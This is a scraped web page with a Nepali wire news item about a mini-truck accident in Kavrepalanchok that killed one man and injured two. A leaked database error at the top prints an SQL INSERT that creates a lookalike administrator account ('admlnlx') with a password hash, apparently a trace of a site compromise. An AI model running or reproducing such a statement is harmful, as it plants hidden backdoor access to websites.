WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp.QHfmGOB2j6zjAuswbbpUiXRomuM/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:04:23', '', 'admlnlx', 'admlnlx')
बनेपा, माघ २२ –
काभ्रेपलाञ्चोकको मेच्छेपौवा गाविस–३ लुङसालमा आज भएको दुर्घटनामा एक जनाको घटनास्थलमा मृत्यु भएको छ भने अन्य दुईजना घाइते भएका छन् ।
आफ्नो घर बनाउन मङ्गलटारको स्थानीय नदीबाट बालुवा बोकेर मेच्छेपौवा जाँदै गरेको बा ३ ख ४१०० नं को मिनि ट्रक दुर्घटना हँुदा मेच्छेपौवा–३ निवासी सन्तमान तामाङको मृत्यु भएको जिल्ला प्रहरी कार्यालय धुलिखेलका प्रहरी नायब उपरीक्षक नवीनराज राईले जानकारी दिनुभयो ।
सो दुर्घटनामा तामाङकी श्रीमती ५५ वर्षीया ठूलीमाया तामाङ र चालक सिन्धुली झागाझुलीका–२२ वर्षीय सुनिल तामाङको धुलिखेल अस्पतालमा उपचार भइरहेको छ । प्रहरीका अनुसार गाडी सडकबाट झन्डै ३० मिटर तल खसेको थियो । – रासस